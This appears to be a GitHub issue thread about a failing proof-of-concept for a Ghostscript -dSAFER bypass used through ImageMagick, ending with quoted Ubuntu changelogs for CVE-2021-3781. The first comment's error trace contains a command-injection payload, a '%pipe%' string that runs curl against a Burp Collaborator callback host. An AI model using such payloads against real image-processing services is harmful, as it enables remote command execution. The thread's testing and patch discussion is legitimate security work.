Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Test Fail #1

Open
jaikishantulswani opened this issue Sep 6, 2021 · 2 comments
Open

Test Fail #1

jaikishantulswani opened this issue Sep 6, 2021 · 2 comments

Comments

@jaikishantulswani
Copy link

@duc-nt While converting the created image to test the ping back, getting error with convert:

Error: /invalidfileaccess in --file--
Operand stack:
   1   (%pipe%/tmp/;curl 2gj351jqe87m2ejpv36nmdyr2i89wy.burpcollaborator.net)   (r)
Execution stack:
@secskb
Copy link

secskb commented Jun 6, 2022

me,too
ubuntu 20.04
imagemagick (8:6.9.10.23+dfsg-2.1ubuntu11.4) and imagemagick (6.9.10-22)
test pwd, curl, /bin/bash

@bogn83
Copy link

bogn83 commented Sep 27, 2022
edited
Loading

Was fixed in one of those two updates I'd say (pretty sure it's the 1st one as CVE & ghostcript blog link in it sound super similar):

ghostscript (9.50~dfsg-5ubuntu4.3) focal-security; urgency=medium

  * SECURITY UPDATE: Trivial -dSAFER bypass
    - debian/patches/CVE-2021-3781-pre1.patch: handle format strings in
      pipe OutputFiles in base/gslibctx.c.
    - debian/patches/CVE-2021-3781-pre2.patch: fix pdfwrite "%d" mode with
      file permissions in base/gsdevice.c, base/gslibctx.c.
    - debian/patches/CVE-2021-3781-pre3.patch: move "break" to correct
      place in base/gslibctx.c.
    - debian/patches/CVE-2021-3781.patch: include device specifier strings
      in access validation in base/gdevpipe.c, base/gp_mshdl.c,
      base/gp_msprn.c, base/gp_os2pr.c, base/gslibctx.c.
    - CVE-2021-3781

 -- Marc Deslauriers <[email protected]>  Thu, 09 Sep 2021 09:34:31 -0400

ghostscript (9.50~dfsg-5ubuntu4.2) focal-security; urgency=medium

  * SECURITY UPDATE: Multiple security issues
    - debian/patches/CVE-2020-16*.patch: backport multiple upstream commits
      to fix various security issues.
    - CVE-2020-16287, CVE-2020-16288, CVE-2020-16289, CVE-2020-16290,
      CVE-2020-16291, CVE-2020-16292, CVE-2020-16293, CVE-2020-16294,
      CVE-2020-16295, CVE-2020-16296, CVE-2020-16297, CVE-2020-16298,
      CVE-2020-16299, CVE-2020-16300, CVE-2020-16301, CVE-2020-16302,
      CVE-2020-16303, CVE-2020-16304, CVE-2020-16305, CVE-2020-16306,
      CVE-2020-16307, CVE-2020-16308, CVE-2020-16309, CVE-2020-16310,
      CVE-2020-17538

 -- Marc Deslauriers <[email protected]>  Fri, 21 Aug 2020 12:57:00 -0400

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@jaikishantulswani @secskb @bogn83